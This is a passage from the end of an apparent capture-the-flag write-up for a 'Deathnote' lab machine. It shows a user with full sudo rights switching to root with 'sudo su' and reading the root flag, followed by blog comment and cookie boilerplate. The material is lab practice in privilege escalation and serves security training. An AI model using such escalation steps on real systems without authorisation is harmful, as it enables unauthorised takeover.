[sudo] password for kira:                                                                                                       
Matching Defaults entries for kira on deathnote:                                                                                
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin                      
                                                                                                                                
User kira may run the following commands on deathnote:                                                                          
    (ALL : ALL) ALL                                                                                                             
kira@deathnote:/opt/L/fake-notebook-rule$ 

Kira has all permission, which means we successfully escalated the highest privilege. To obtain the root flag, simply change the directory to the /root path. 

kira@deathnote:/opt/L/fake-notebook-rule$ cd /root                                                                              
bash: cd: /root: Permission denied                                                                                              
kira@deathnote:/opt/L/fake-notebook-rule$ sudo su
root@deathnote:/opt/L/fake-notebook-rule# cd /root
root@deathnote:~# ls 
root.txt
root@deathnote:~# cat root.txt 


      ::::::::       ::::::::       ::::    :::       ::::::::       :::::::::           :::    :::::::::::       :::::::: 
    :+:    :+:     :+:    :+:      :+:+:   :+:      :+:    :+:      :+:    :+:        :+: :+:      :+:          :+:    :+: 
   +:+            +:+    +:+      :+:+:+  +:+      +:+             +:+    +:+       +:+   +:+     +:+          +:+         
  +#+            +#+    +:+      +#+ +:+ +#+      :#:             +#++:++#:       +#++:++#++:    +#+          +#++:++#++   
 +#+            +#+    +#+      +#+  +#+#+#      +#+   +#+#      +#+    +#+      +#+     +#+    +#+                 +#+    
#+#    #+#     #+#    #+#      #+#   #+#+#      #+#    #+#      #+#    #+#      #+#     #+#    #+#          #+#    #+#     
########       ########       ###    ####       ########       ###    ###      ###     ###    ###           ########       

##########follow me on twitter###########3
and share this screen shot and tag @KDSAMF
root@deathnote:~# 

Congratulations! We obtained both flags.

Tags

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.

#buttons=(Ok, Go it!) #days=(20)

Our website uses cookies to enhance your experience. Learn More
Ok, Go it!